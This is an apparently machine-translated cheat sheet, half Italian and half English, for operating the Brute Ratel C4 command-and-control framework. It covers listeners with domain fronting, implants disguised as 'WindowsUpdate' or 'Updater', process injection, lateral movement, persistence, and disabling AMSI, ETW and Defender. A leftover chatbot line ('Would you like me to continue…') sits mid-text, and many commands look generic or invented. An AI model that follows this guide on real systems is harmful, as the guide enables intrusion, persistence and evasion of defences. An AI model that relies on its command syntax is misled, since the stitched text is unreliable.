Brute Ratel C4 Framework Foglio di Riferimento¶
Panoramica¶
Brute Ratel C4 (BRc4) è un framework Command and Control (C2) commerciale personalizzato progettato per operazioni di red team e simulazioni di avversari. Fornisce avanzate capacità di evasione, sofisticate funzionalità post-sfruttamento e sicurezza operativa di livello professionale.
⚠️ Avvertenza: Questo è uno strumento commerciale che richiede una licenza valida. Questo strumento è destinato esclusivamente a test di penetrazione autorizzati ed esercitazioni di red team. Assicurati di avere l'autorizzazione prima di utilizzarlo in qualsiasi ambiente.
Installazione¶
Attivazione Licenza¶
# Activate license (requires valid license key)
./brc4 --activate <license-key>
# Verify license status
./brc4 --license-info
# Update license
./brc4 --update-license
Configurazione Server¶
# Start BRc4 server
./brc4 --server
# Start with custom configuration
./brc4 --server --config /path/to/config.json
# Start with specific interface
./brc4 --server --interface 0.0.0.0 --port 443
Connessione Client¶
# Connect to server
./brc4 --client --server 192.168.1.100:443
# Connect with authentication
./brc4 --client --server 192.168.1.100:443 --auth-token <token>
Riferimento Comandi¶
Gestione Server¶
| Comando | Descrizione |
|---|---|
help |
Visualizza menu di aiuto |
version |
Mostra informazioni sulla versione |
listeners |
Elenca listener attivi |
badgers |
Elenco dei badger (agenti) connessi |
operators |
Elenco operatori connessi |
exit |
Esci dal server BRc4 |
| ### Gestione Listener | |
| Comando | Descrizione |
| --------- | ------------- |
listener http |
Crea listener HTTP |
listener https |
Creare un listener HTTPS |
listener dns |
Crea listener DNS |
listener tcp |
Crea listener TCP |
listener smb |
Crea listener SMB |
listener stop <id> |
Ferma listener |
| ### Gestione Badger (Agente) | |
| Comando | Descrizione |
| --------- | ------------- |
badger <id> |
Interagisci con badger |
badger kill <id> |
Uccidi tasso |
badger sleep <time> |
Imposta intervallo di sonno |
badger jitter <percentage> |
Imposta percentuale di jitter |
badger proxy <proxy> |
Imposta proxy per badger |
| ## Configurazione Listener |
Listener HTTP/HTTPS¶
# Create HTTPS listener
listener https
set host 0.0.0.0
set port 443
set cert /path/to/cert.pem
set key /path/to/key.pem
set malleable /path/to/profile.profile
start
# Create HTTP listener with domain fronting
listener http
set host 0.0.0.0
set port 80
set front-domain cdn.example.com
set host-header legitimate-site.com
start
Listener DNS¶
# Create DNS listener
listener dns
set domain example.com
set nameserver ns1.example.com
set port 53
start
Listener SMB¶
Listener TCP¶
Generazione Badger¶
Badger Windows¶
# Generate Windows executable
generate windows exe
set listener https-443
set arch x64
set format exe
set output windows_badger.exe
generate
# Generate Windows DLL
generate windows dll
set listener https-443
set arch x64
set format dll
set output windows_badger.dll
generate
# Generate Windows service
generate windows service
set listener https-443
set arch x64
set service-name "WindowsUpdate"
set output windows_service.exe
generate
Badger Linux¶
# Generate Linux ELF
generate linux elf
set listener https-443
set arch x64
set format elf
set output linux_badger
generate
# Generate Linux shared library
generate linux so
set listener https-443
set arch x64
set format so
set output linux_badger.so
generate
Badger macOS¶
# Generate macOS binary
generate macos macho
set listener https-443
set arch x64
set format macho
set output macos_badger
generate
# Generate macOS application
generate macos app
set listener https-443
set arch x64
set app-name "Updater"
set output macos_app.app
generate
Comandi Post-Sfruttamento¶
Informazioni di Sistema¶
# Get system information
sysinfo
# Get current user
whoami
# Get privileges
getprivs
# Get environment variables
env
# Get network interfaces
ifconfig
Operazioni su File¶
# List directory
ls /path/to/directory
# Change directory
cd /path/to/directory
# Download file
download /remote/path/file.txt
# Upload file
upload /local/path/file.txt /remote/path/
# Execute file
execute /path/to/executable
# Delete file
rm /path/to/file
Gestione Processi¶
# List processes
ps
# Kill process
kill <pid>
# Migrate to process
migrate <pid>
# Inject into process
inject <pid> <payload>
# Create process
spawn <executable>
Operazioni di Rete¶
# Network connections
netstat
# ARP table
arp
# Routing table
route
# Port scan
portscan 192.168.1.0/24 80,443,3389
# Ping sweep
ping 192.168.1.0/24
Funzionalità Avanzate¶
Profili C2 Malleabili¶
# Load malleable profile
set malleable /path/to/profile.profile
# Custom HTTP profile
http-get \\\\{
set uri "/api/v1/status";
client \\\\{
header "User-Agent" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";
header "Accept" "application/json";
\\\\}
server \\\\{
header "Content-Type" "application/json";
output \\\\{
print;
\\\\}
\\\\}
\\\\}
Tecniche di Iniezione di Processo¶
Would you like me to continue with the remaining sections?```bash
Classic DLL injection¶
inject-dll
Process hollowing¶
hollow
Reflective DLL loading¶
reflective-dll /path/to/dll.dll
Manual DLL mapping¶
map-dll
Thread hijacking¶
hijack-thread
Lateral Movement¶
# WMI execution
wmi-exec 192.168.1.10 "whoami"
# PSExec
psexec 192.168.1.10 "whoami"
# SMB execution
smb-exec 192.168.1.10 "whoami"
# DCOM execution
dcom-exec 192.168.1.10 "whoami"
# WinRM execution
winrm-exec 192.168.1.10 "whoami"
Persistence Mechanisms¶
# Registry persistence
persist-registry HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "Update" "C:\temp\badger.exe"
# Scheduled task
persist-task "WindowsUpdate" "C:\temp\badger.exe" daily
# Service persistence
persist-service "UpdateService" "C:\temp\badger.exe"
# WMI persistence
persist-wmi "ProcessStart" "C:\temp\badger.exe"
# Startup folder
persist-startup "C:\temp\badger.exe"
Evasion Techniques¶
Anti-Analysis¶
# VM detection
vm-detect
# Sandbox evasion
sandbox-evasion
# Debugger detection
debugger-detect
# Sleep evasion
sleep-evasion 300
# User interaction check
user-interaction
AMSI/ETW Bypass¶
# AMSI bypass
amsi-bypass
# ETW bypass
etw-bypass
# Disable Windows Defender
disable-defender
# Unhook DLLs
unhook-dlls
# Patch AMSI
patch-amsi
Traffic Obfuscation¶
# Domain fronting
set front-domain cdn.cloudflare.com
set host-header legitimate-site.com
# Custom User-Agent
set user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
# Custom headers
set headers "X-Forwarded-For: 192.168.1.100"
# Proxy chains
set proxy-chain "http://proxy1:8080,socks5://proxy2:1080"
Payload Obfuscation¶
# Encrypt payload
encrypt-payload aes256 <key>
# Obfuscate strings
obfuscate-strings
# Pack executable
pack-exe upx
# Sign executable
sign-exe /path/to/cert.pfx
# Polymorphic generation
polymorphic-gen
Operational Security¶
Communication Security¶
# Use encrypted channels
set encryption aes256
# Certificate pinning
set cert-pinning true
# Custom TLS configuration
set tls-version 1.3
set cipher-suite ECDHE-RSA-AES256-GCM-SHA384
# Jitter configuration
set jitter 20
set jitter-type random
Infrastructure Management¶
# Redirector setup
set redirector nginx
set upstream-server 192.168.1.100:443
# Load balancing
set load-balancer round-robin
set backend-servers "192.168.1.100,192.168.1.101"
# Failover configuration
set failover-servers "backup1.com,backup2.com"
Logging and Monitoring¶
# Enable detailed logging
set log-level debug
set log-file /var/log/brc4.log
# Operator tracking
set operator-logging true
# Command auditing
set command-audit true
# Session recording
set session-recording true
Team Operations¶
Multi-Operator Support¶
# Add operator
operator add username password
# Set operator permissions
operator permissions username read,write,execute
# Operator sessions
operator sessions
# Kick operator
operator kick username
Collaboration Features¶
# Share badger session
share-session <badger-id> <operator>
# Session notes
note-add "Important finding"
note-list
note-delete <note-id>
# Team chat
chat "Message to team"
chat-history
Troubleshooting¶
Connection Issues¶
# Test listener
test-listener <listener-id>
# Check connectivity
test-connectivity <target>
# Verify certificates
verify-cert /path/to/cert.pem
# Debug mode
set debug true
Badger Issues¶
# Badger health check
health-check <badger-id>
# Reset badger
reset-badger <badger-id>
# Badger diagnostics
diagnostics <badger-id>
# Force reconnect
reconnect <badger-id>
Performance Optimization¶
# Optimize sleep intervals
set sleep-optimization true
# Bandwidth throttling
set bandwidth-limit 1024
# Connection pooling
set connection-pooling true
# Compression
set compression gzip
Configuration¶
Server Configuration¶
\\\\{
"server": \\\\{
"host": "0.0.0.0",
"port": 443,
"ssl": true,
"cert": "/path/to/cert.pem",
"key": "/path/to/key.pem"
\\\\},
"database": \\\\{
"type": "sqlite",
"path": "/opt/brc4/database.db"
\\\\},
"logging": \\\\{
"level": "info",
"file": "/var/log/brc4.log"
\\\\}
\\\\}
Malleable Profile¶
# Custom malleable profile
set sample_name "Custom Profile";
set sleeptime "30000";
set jitter "20";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";
http-get \\\\{
set uri "/api/status";
client \\\\{
header "Accept" "application/json";
header "Accept-Language" "en-US,en;q=0.9";
\\\\}
server \\\\{
header "Content-Type" "application/json";
output \\\\{
print;
\\\\}
\\\\}
\\\\}
Resources¶
Questo cheat sheet fornisce un riferimento completo per l'utilizzo di Brute Ratel C4. Questo è uno strumento commerciale che richiede una licenza appropriata. Assicurati sempre di avere l'autorizzazione prima di utilizzare questo strumento in qualsiasi ambiente.